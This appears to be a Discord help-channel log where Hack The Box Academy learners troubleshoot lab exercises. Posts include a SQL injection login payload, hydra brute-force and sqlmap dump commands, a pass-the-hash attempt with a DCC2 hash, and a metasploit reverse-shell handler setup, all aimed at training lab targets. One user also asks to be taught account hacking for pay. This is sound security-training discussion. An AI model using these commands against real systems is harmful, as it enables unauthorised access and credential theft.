payload = '<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:tns="http://tempuri.org/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/">soap:Body<LoginRequest xmlns="http://tempuri.org/"><username>admin</username><password> 'or 1 = 1' </password></LoginRequest></soap:Body></soap:Envelope>'
^
SyntaxError: cannot assign to operator

acoustic owl
obsidian kettle
#

I could use some help, I am stuck on skill assessment brute forcing, does any one know what .txt file we are suppose to use for the password. I have tried multiple files (from locate password) and they either do not work or I get a list of passwords, and not work with the user name.

wraith delta
#

how tf do i get more cubes without paying

autumn pilot
#

win giveaways or ctfs

wraith delta
#

ok

#

Whats the objective of the hackthebox machine thing

#

how do we do it

glacial hazel
acoustic owl
obsidian kettle
#

I do not believe so for the first skill assessment that is login into the browser.

acoustic owl
harsh steppe
#

Hi, i'm struggling on the Active Directory Enum and Attack. The question is What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word).

i can't figure out where to look

obsidian kettle
acoustic owl
obsidian kettle
#

I wish...I have done rock you multiple time with even different Rock you versions. sometime I get passwords sometimes I dont, usually I get password file not found

obsidian kettle
# acoustic owl okay, then ||rockyou|| will help you

example I have used this: hydra -l user -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt "http-post-form://157.245.41.35:31182/admin_login.php:user=^USER^&pass=^PASS^:F<form name='login'"
and I get:

#

[ERROR] File for passwords not found: /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt

obsidian kettle
# acoustic owl Check the path of your file

I have done locate Rockyou.txt and those file paths do not work. I am assuming the issue is the path for Rockyou.txt that I am having issue with but I cannot seem to fix it

acoustic owl
#

Are you using the PwnBox or your own VM?

obsidian kettle
#

I never know how to answer this, I think it is PwnBox. It is whatever I spawn then hit Parrot terminal

obsidian kettle
#

yep that is what I use

acoustic owl
#

okay, then the File should be here: /usr/share/wordlists/rockyou.txt

#

and here: /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt

obsidian kettle
obsidian kettle
#

Thank you for your assistance

blissful sage
#

hi everyone. Not trying to thread hijack or anything, But im having an issue with HTB Academy. My option to load the target box isnt there anymore. I've looked up the VPN troubleshooting, but nothing helped. Anyone have any ideas?

autumn pilot
#

Maybe that specific exercise doesn't need a target

rich light
#

The Attacks & Defense module is broken. The PKI - ESC1 segment cannot be answered because the PKI machine does not boot up

blissful sage
autumn pilot
blissful sage
# autumn pilot

Ope. Ok. Thank you. I'll check other ones and see if its the same way

misty cedar
blissful sage
blissful sage
rustic sage
#

I have been stumped for a few hours now this morning and last night on the footprinting medium lab. I have the first set of credentials but I cant get any further now.

fiery berry
rustic sage
#

hey anyone having some troubles with the 3rd host in the live engagement section on the shells & payloads module ?
the ethernalblue is failing ? when tracing it back it can't write to the coruptted buffer

#

Anyone solved this issue ?

#

i've tried cahnging the payload

iron grove
#

@zatoich1#3252

thorn cosmos
#

Hey guys, I'm stuck on the HArd Lab of "Firewall and IDS/IPS Evasion"... I made the firsts two without any problem but this one... Anyone for an advice?

rustic sage
heady nymph
#

BROKEN AUTHENTICATION Predictable Reset Token question 1. Why is it causing me so much trouble? If anyone can spare a moment...

tribal plinth
left sapphire
#

this does not work for my brute force attack.

module 57, section 515

wraith delta
#

how do we play the hackthebox machine

#

how do we connect and stuff

thorn cosmos
wraith delta
#

how do i connect to a machine from my kali linux

harsh steppe
wraith delta
#

qhere do i find the VPn file

#

after i spawn the machine

harsh steppe
#

look for a button "Download VPN connection file". If you want to learn hacking, you have toobe a little bit more curious and try to figure out things by your own

wraith delta
#

Im new to hackthbox i usually train with vids like cybrary

heady nymph
#

no one?

#

...

long grove
#

Hello guys for the "Password attacks" session "Hunting Credential in Linux" , the hint gave me username and password which is Kira and LoveYou1 but when I ssh given username and password it says password is wrong am I doing something wrong here?

autumn pilot
#

Perhaps the user has had the opportunity to change the password a bit

heady nymph
#

BROKEN AUTHENTICATION: Predictable Reset Token, question 1.
I have tried through vpn and the pwnbox,
have tried multiple time options,
I've made several adustments to the reset script,
I am out of ideas as to why its not working.

spice fox
#

Hacking WordPress - Skill Assessment
I cannot access http://blog.inlanefreight.local and cannot move forward with the skills assessment. Am I doing something wrong?

autumn pilot
#

You need to add an entry in your hosts file to access it

acoustic owl
#

local is not a TLD that has been approved by IANA. Therefore it cannot be resolved by the root nameservers.
Here you can find a list of all approved TLDs
https://www.iana.org/domains/root/db

heady nymph
#

anyone

mystic light
# heady nymph anyone

dude. people do this out of the kindness of their heart, whenever theyre online.
patience is a virtue. go do something else

rustic sage
#

Hey anyone has done the shells&payload module ?

acoustic owl
heady nymph
#

no matter what happens i never get the right token

odd knot
#

can anyone help me with the shared object hijacking lab in Linux privilege escalation?

heady nymph
#

@mystic light I asked yesterday too and there has been no response. I am working on other things, it just bothers me that I can't solve that one.

glacial hazel
heady nymph
#

@glacial hazel BROKEN AUTHENTICATION: Predictable Reset Token, question 1.
I have tried through vpn and the pwnbox,
have tried multiple time options,
I've made several adustments to the reset script,
I am out of ideas as to why its not working.

acoustic owl
heady nymph
#

is not the server time the time it shows in the browser when you reset token?

acoustic owl
heady nymph
#

it goes through the 2000 possibilities for the +- 1 sec around that time to no sucess

acoustic owl
acoustic owl
acoustic owl
odd knot
# acoustic owl What exactly is the problem?

I think the problem is that I donโ€™t figure out where I have to copy the c code in. They talk about the dbquery but I donโ€™t find this file and now I create my own file but itโ€™s doesnโ€™t work. I think I donโ€™t understand this message โ€œWe can compile a shared object which includes
this functionโ€

acoustic owl
#

this question?
Follow the examples in this section to escalate privileges, recreate all examples (don't just run the payroll binary). Practice using ldd and readelf. Submit the version of glibc (i.e. 2.30) in use to move on to the next section

steep wave
#

Hey everyone, I am going through the Information Security Foundations path, when adding an SSH key to a VPS, do you also add the username@devicename bit at the end or do you delete that?

glacial hazel
#

?

#

What do you mean

#

Are you trying to connect to a server using a private key?

glacial hazel
sand badger
#

hello guys

steep wave
acoustic owl
glacial hazel
# steep wave yes that

You just need to append the contents of the id_rsa.pub file to the authorized_keys file in the .ssh directory in the home directory of the user you want to login as on the server

steep wave
#

So the username@device of the VPS I am trying to connect to?

glacial hazel
#

donโ€™t touch anything in the file

#

Just copy it the contents of the file like I said lemonthink_hd

steep wave
#

ohhhhhhhhh I see what your saying

glacial hazel
#

ye

steep wave
#

vultr makes you copy paste the key so I was confused

subtle glen
#

AD enumeration & attacks, privilaged access, 1st question, the command on bloodhount ||MATCH p1=shortestPath((u1:User)-[r1:MemberOf1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote1..]->(c:Computer) RETURN p2|| provided by the module does not work, and as the module shows, this is the only was to solve the question, do i need to log in bloodhount as another user?

tribal plume
#

Active Directory Enumeration Skills Assessment Part 2. I used secretsdump.py on the sam hives and got hash INLAN___.LOCAL/Adm_____:$DCC2$10240#Adm_______#33______<A HASH HERE>__________________ can I pass this hash to logon by using: proxychains /v:172.16.7.__ /u:INLAN___.LOCAL/Adm_____ /pth:"$DCC2$10240#Adm_______#33______<A HASH HERE>__________________" I'm not sure if my syntax is wrong, or I just can't pass the hash this way.

tribal plume
subtle glen
brazen hinge
#

Hi, i am stuck in Broken Authentication - Skill Assessment. Im trying bruteforce password for ||support.us|| user using the next wordlist
||cat /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt | grep '^[A-Z].*[0-9]$' | grep -E '[$#@]' | grep '[a-z]' | grep -E '^.{20,29}$'||, any hint?

autumn pilot
subtle glen
autumn pilot
#

You need to run it, then you will be presented with a zip file of the findings which you can import

subtle glen
#

same module, last question, do i need to do anything before i attempt to use mssqlclient? what am i missing? i get timed out, im using this command: ||mssqlclient.py INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth|| the question asks me to connect this ip

i tried running powershell and sql commands on PowerUpSQL but they did not work

willow bluff
#

Howdy! I am currently having a problem with the IMAP/POP3 segment of the Footprinting module.

The problem is, I logged in to the email of the provided credentials via email client Evolution ||since all I get for credentials in the directions is robin:robin, I can't tell if the email is robin@inlanefreight.htb or robin.dev@dev.inlanefreight.htb so I used both||. Kicker is, when I try to refresh the inbox/drafts, there are no emails (when I am pretty sure there are supposed to be emails of some sort, per the directions).

If I may ask, and if y'all know, may you kindly help me amidst this predicament? Thanks for reading, and I hope y'all have a grand day! (also if you do respond, may I kindly ask that you ping me?)

#

sorry, I just realized that I needed to exit and reenter the email client (how silly). I thank you all for reading again, and hope y'all have a high quality day!

cursive gull
#

Hey guys, Iโ€™ve been trying to troubleshoot this for the last two hours. Iโ€™m trying to replicate the example from โ€œPivoting, Tunneling & Port Forwarding โ€“ Meterpreter Tunneling & Port Forwardingโ€, but no matter what I do, I canโ€™t seem to get a shell. Can anyone spot where Iโ€™m going wrong?

quartz pivot
#

Hi @gritty sundial I just read through that you complete the LFI skills assessment. I have been successful up to a point with this module. I can read the /etc/passwd, I can read the nginx access log, and I have successfully been able to add poison as the user agent. when I try adding the shell code it fails and the access log dies. Mostly I suspect from having the double quote in there breaking the format of the log. I have tried URL encoding it as well with no success. So I guess I am asking for a small hint. what am I missing here. any help would be greatly appreciated.

fathom pendant
#

I'd suggest rereading the section top to bottom

cursive gull
#

It's exactly the same as the example in the section

fathom pendant
#

Ok then it may be your msfvenom payload

#

Try remaking it

#

But like I said it could have been something simply overlooked

cursive gull
#

i did multiple times for the last 2 hours lol

fathom pendant
#

Cause it looks like in that screenshot the shell.exe didn't finish crafting

#

Try putting LPORT before the -f and -o flags

cursive gull
fathom pendant
#

Hmm I didn't have issues. Not at my computer to double check. It could be that for some reason the autoroute didn't catch the final target IP

cursive gull
#

That's what i was thinking but i've even tried adding the host's exact address 172.16.5.19/23 instead of the subnet

fathom pendant
#

Double check you're using the right ip

cursive gull
#

I've gone through every single command double checking the ip's

#

i dont get it ๐Ÿ˜ฆ

fathom pendant
#

ยฏ_(ใƒ„)_/ยฏ

#

Try resetting the lab and rerunning the commands

cursive gull
#

done it about 5 times

fathom pendant
#

Hmm

tribal plume
#

Active Directory Skills Assessment 2, I'm on the question where you try and move from SQL01 to MS01. I have system level access on SQL01 and used that to copy the sam files and use impacket-secretsdump to get the domain login hashes for "Administrator" account and ms-----c accounts. I also got the cleartext password for the ms-----c account. I've been trying to pass the Administrator hash to login to MS01 but I can't seem to figure out how. Am I going down the wrong path here?

kind holly
#

hey, can anyone tell me , why i am not able to connect support team .

heady tusk
warm dagger
#

same, same... were you able to find the solution?

heady tusk
willow bluff
#

If I may ask, I have a slight predicament with DNS in the Footprinting module. If I may, when you brute force the subdomain, what is the best wordlist to use, or what did y'all use if I may ask? Thanks for reading, and I hope y'all have a lively day!

tribal plume
zinc marsh
#

someone can help me in password attacks pass the hash section last question

#

there is no way i can get the reverse shell

warm dagger
#

@heady tusk MUCH THANKS!

swift tartan
#

Currently at "Password attacks / Credential Hunting in Linux".
The question is "Examine the target and find out the password of the user Will. Then, submit the password as the answer.".

Do I need to get access to the system before or am I missing a step how to examine the target? On the windows modules we always had the credentials.

heady tusk
marble shadow
#

HEJ szukam kogoล› kto zna siฤ™ na hakowaniu kont i ogรณlnie kto by mรณgล‚ mnie nauczyฤ‡ fajnych rzeczy (moge zapล‚aciฤ‡)
๐Ÿ’ฃ
HEY I'm looking for someone who knows about hacking accounts and who can teach me cool things(I can pay)

woeful ermine
heady tusk
heady tusk
swift tartan
heady tusk
#

good luck ๐Ÿ™‚

naive field
#

for password attacks proctected archived. am I supposed to use rockyou.txt to crack the zip file?

#

this module got me confused. they never mention when u need to use which password list, the one they provided or mutated one or rockyou or some otheerr...

woeful ermine
autumn pilot
#

thats the goal of the modules, to teach you to think and understand what you need to do to go to the next step

#

even sometimes that be head banging or a breeze

naive field
autumn pilot
#

playing the machines through the season on the main platform

spiral pelican
#

Hi all
module : documentation and reporting
section : skill assessment
i found an admin password (Hxxx0) on the DEV01 host in a file. But its not working. I am very confuse with it.
Just want to know if it is normal or not ๐Ÿ˜…
thanks all ๐Ÿ™‚

sage jackal
#

Hello need help on Kerberos Attacks Constrained Delegation - Users section. I basically follow the steps but I get an error when I try to use psexec

autumn pilot
#

what is the error

sage jackal
#

Errno Connection Error name or service not known

autumn pilot
#

have you added the domain to your hosts file?

sage jackal
#

I followed all the steps correctly even using the pwnbox

#

Yes

autumn pilot
#

take a screenshot of the hosts file

neat trench
#

anyone had problem connecting to msf reverse tcp using vpn config? (using pwnbox everything fine)

dim hound
broken warren
#

Intro to Network Traffic Analysis module, Tcpdump fundementals. "Given the capture file at /tmp/capture.pcap, what tcpdump command will enable you to read from the capture and show the output contents in Hex and ASCII? (Please use best practices when using switches)" this is the only question i haven't got in the whole module. Like I know what switch i need to read .pcap files AND to read them with ASCII. And if i use them both to read a .pcap file it works but when i enter them in as the answer it doesn't.

dim hound
#

@spiral pelican I am, from there I am selecting the 3000

dim hound
autumn pilot
#

paste again the screenshot, without the flag in the background

#

there is

woeful ermine
dim hound
#

aww got it! @woeful ermine @spiral pelican Thanks!

dim hound
#

I do think, they should clarify it better

spiral pelican
autumn pilot
#

the format of the double quotes seems funny

spiral pelican
#

try export without quote (")

simple zephyr
#

Windows Priv Esc Assessment part I: Find the password for the ldapadmin account somewhere on the system.

I have ran every search variable POSSIBLE, I cannot for the life of me find this flag.

spiral pelican
#

or remove your " in the wordlist arg in the cmd

misty current
#

It's getting wrapped in quotes twice. But I'm not sure if that's the issue.

woeful ermine
simple zephyr
#

yeah i used lazagne also

autumn pilot
#

just replace them with new quotes, the current once seem to be from word (times new roman or similar)

misty current
#

Did you copy paste the gobuster command?

#

We can see them. Might be some problem at your end.

spiral pelican
simple zephyr
#

idk?

keen compass
dim hound
#

Yea sure @keen compass

misty current
misty current
spiral pelican
simple zephyr
#

thats annoying isn't that step 3 lol

spiral pelican
#

yep ^^

#

but you dont need the first one for the next questions

#

so you have two options here

simple zephyr
#

i got it from here lol. I already figured out whats vulnerable on it, just didn't go that route yet, because I wanted this dumb flag

rugged stag
#

Did you find out why secretsdump.py gives different results? And thanks for that commentary, helped me solve it.

keen depot
#

I'm in the Linux Fundamentals module and I'm pretty sure the target for this particular section is totally broken. I'm not actually new to Linux, I'm doing the module to get it out of the way (and because its free) and when the VPN isn't malfunctioning, the target completely freezes up when I try and list files in a particular directory where I'm supposed to for the exercise FeelsBadMan

#

Anyone have any insights? Any means of contacting HTB directly?

onyx rapids
#

HTTP Misconfigurations : Common Session Variables (Account Takeover)

Anyone finish this lab? I've reset the password multiple times, but I still can't login as admin

balmy radish
unique valve
fathom pendant
keen depot
#

Okay I finally found where to contact support on the site... seems like its a bit harder to track that down than it should be but I've messaged them over their help chat

keen depot
vagrant gust
#

hi im having trouble enumerating users with both rpcclient and the samrdump.py

#

this for the smb section in the footprinting module

quartz pivot
#

OK Just completed the LFI Skills assessment ... It took me going through https://academy.hackthebox.com/module/23/section/252 and doing the BurpSuite stuff step by step... and the Devils are in the details. I had to redo the whole thing 3 times to make sure I understood it. so If you got questions let me know.

#

BTW I was stuck on this for like 4 days

#

so do not get discouraged

queen gazelle
#

Hi friends --

I am currently working through the SQL Map module and am stuck on this question on "Attack Tuning":
What's the contents of table flag6? (Case #6)

Here's my current syntax, and I do not understand what it's not working:
sqlmap -r case6.txt --dbms=mysql --prefix='`)' --level=3 --risk=3 --dump-all

I have also ran it with "verbose" mode to make sure it was passing the prefix properly, and it seems to be. The prefix comes directly from the hint, which states, Use the prefix '`)'.


It detects that it's injectable and it's MySQL but then fails after that and I cannot enumerate the database or tables. Am I missing something obvious here?

Thanks in advance ๐Ÿ™‚

queen gazelle
rustic sage
#

I'm stuck at the last question: https://academy.hackthebox.com/module/167/section/1633 . I found the most logon failures generated by user0. but the answer is wrong? "What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? Flag is the name of the user account."

acoustic owl
rustic sage
#

yes

#

and it looks like its user0, i have tried the others as well

naive field
#

i hate this password attacks module

#

:/

#

just a question

#

im using this cmd to crack ftp pw in password attacks easy lab

#

and it says 1hour left till the end

#

||hydra -L username.list -P password.list ftp://ip||

#

is it okay?

#

i dont want to wait an hours to see it not work ๐Ÿฅฒ

#

its not that i dont want to, i dont have time to lol

manic magnet
#

normally i takes around 5 to 10 min max

naive field
#

its been 7min rn soo ๐Ÿคทโ€โ™‚๏ธ

manic magnet
#

No. Pwnbox should make it faster because its not router through the VPN

manic magnet
#

give me a sec

left sapphire
#

i ran the ffuf command for "Directory Fuzzing" and i dont see any results, not even the "blog" one where HTB Academy told me it existed

idk what i should be looking for

naive field
manic magnet
naive field
#

thanks!

manic magnet
#

no problem ^^

manic magnet
manic magnet
thorn urchin
#

usually the full eta isnt needed even in real world situations

manic magnet
left sapphire
#

thanks for the help though

rustic sage
#

hey guys

#

I have a question

thorn urchin
rustic sage
#

I have a question

thorn urchin
#

please actually read the link and not the title of the link

rustic sage
#

no I mean one for a real person

thorn urchin
rustic sage
#

no seriously

thorn urchin
#

I am being serious

rustic sage
#

I was just wondering if this is illegal

thorn urchin
#

read the link

rustic sage
#

the thing I will talk about

thorn urchin
#

this channel isnt for that kind of discussion

#

module discussion only

rustic sage
#

bruh

thorn urchin
#

its server rules my dude

#

comply or get the boot and nobody answers

manic magnet
#

@rustic sage You can ask in the #general chat

thorn urchin
#

except they cant see #general because theyve not verified account by following the instructions in #rules and #welcome

balmy saffron
# naive field just a question

It took about 20 min yesterday for me in the pawnbox with the -t64 parameter. Is that the "sam" one or the ones before. If I remember well, the previous ones went faster in a few minutes with user.list.

rustic sage
#

Hello!

thorn urchin
hazy grotto
#

I need help amigos
[6:26 PM]
I've been having issues wth ssh.

Two different boxes now will not connect via ssh.
[6:27 PM]
Says connection closed. Tried resetting boxes.
[6:27 PM]
when i do service ssh status.
[6:27 PM]
ssh.service - OpenBSD Secure Shell server
Loaded: loaded (/lib/systemd/system/ssh.service; disabled; preset: disabled)
Active: inactive (dead)
Docs: man:sshd(8)
man:sshd_config(5)

frigid osprey
#

Are you still working on this?

vagrant gust
#

having trouble getting a file from smb

#

says Error opening local file flag.txt

merry nexus
#

Hi, where i can contact support? i want to register a new university domain

fathom pendant
merry nexus
#

tried on Brave and Edge

#

none of them browsers show me it

fathom pendant
#

Disable ad/popup blockers

merry nexus
#

Thanks! they verified my university domain

jaunty vigil
#

anyoen can give me atip here

red current
#

I'm really feeling a bit lost on this one. I'm on the Using Web Proxies module in the ZAP Fuzzer section. There appears to be a lack of information on how to select a wordlist in ZAP. I had to download the top-usernames-shortlist.txt to my VM, but I can't find any explanation in the section or anywhere else for that matter on how to use it. Anyone else get past this one?

gentle root
#

Can someone clarify if these commands are being ran on the Ubuntu host or Attack host?:
Remote/Reverse Port Forwarding with SSH
Configuring & Starting the multi/handler
msf6 > use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 8000
lport => 8000
msf6 exploit(multi/handler) > run

[*] Started HTTPS reverse handler on https://0.0.0.0:8000

woeful ermine
#

you need to execute a paylod on ubuntu while using msf though if thats what made you confused

gentle root
woeful ermine
#

you need to have a listener on your attack host while executing payload on ubuntu pivot

#

I am assuming you are using msf for port forwarding. then you should start msf first after that execute payload on ubuntu

gentle root
#

So dynamic port much better to scan with ๐Ÿ™‚

woeful ermine
#

I guess so, I ve never used static port for nmap scanning ๐Ÿ™‚

gentle root
#

Yeah this pivoting module is trolling me. Gotcha thanks.

woeful ermine
red current
#

Never mind. I figured it out. This section really could be explained a little bit better.

tawny mango
#

hi

#

im new